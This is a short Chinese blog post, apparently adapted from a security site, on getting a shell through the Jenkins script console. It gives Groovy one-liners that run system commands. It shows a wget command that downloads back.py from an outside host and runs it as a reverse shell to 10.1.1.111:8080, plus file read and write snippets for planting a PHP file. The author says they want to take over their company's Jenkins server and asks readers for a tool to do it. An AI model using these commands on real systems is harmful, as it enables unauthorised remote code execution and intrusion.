Jenkins拿shell方法
最近一直在学习怎么利用jenkins反序列化,妹的,就是没有一个顺手的GUI工具,能让我直接秒杀服务器。
楼下的小伙伴有好的工具,请给我留言,我要秒了我们公司的jenkins服务器,多谢。。。。
关于反序列化的问题,如果不懂java就是苦逼,小弟我就是这样的苦逼,这个先放一边,先把jenkins拿shell的方法整理一下。
文章来自安全脉搏,略有改动,更加精简。。。
一、Jenkins未授权访问可执行命令
命令执行的话,是需要有相关用户权限的,具体的位置在下图中:
在脚本命令行中输入下面的语句,即可执行相应的命令:
1 | println "ipconfig /all".execute().text |
|---|
推荐上面的这种方式,比较简洁。。
1 | def sout = new StringBuffer(), serr = new StringBuffer() |
|---|
2 | def proc = 'ipconfig'.execute() |
|---|
3 | proc.consumeProcessOutput(sout, serr) |
|---|
4 | proc.waitForOrKill(1000) |
|---|
5 | println "out> $sout err> $serr" |
|---|
老外的方式,比较正式一点。。
下面的截图是执行后的结果,就像在CMD中执行是一样的效果。
二、Jenkins拿shell方法
1、直接wget下载back.py反弹shell,如下:
1 | println "wget http://www.waitalone.cn/tools/back.py -P /tmp/".execute().text |
|---|
2 | println "python /tmp/back.py 10.1.1.111 8080".execute().text |
|---|
2、多种方式写shell
01 | Groovy I/O 文件读写 |
|---|
02 |
|---|
03 | 读文件 |
|---|
04 | new File("/tmp/back.py").getText(); |
|---|
05 | new File("c:/windows/win.ini").getText(); |
|---|
06 |
|---|
07 | //eachLine -- 打开和读取文件的每一行 |
|---|
08 | new File("/tmp/back.py").eachLine { |
|---|
09 | println it; |
|---|
10 | } |
|---|
11 |
|---|
12 | //readLines |
|---|
13 | lineList = new File("/tmp/back.py").readLines(); |
|---|
14 | lineList.each { |
|---|
15 | println it.toUpperCase(); |
|---|
16 | } |
|---|
17 |
|---|
18 | write轻轻松松写文件 |
|---|
19 | new File("/tmp/1.php").write('Hello SecPulse'); |
|---|
20 |
|---|
21 | 多行写入 |
|---|
22 | new File("/tmp/1.php").write(""" |
|---|
23 | This is |
|---|
24 | just a test file |
|---|
25 | to play with |
|---|
26 | """); |
|---|
添加收藏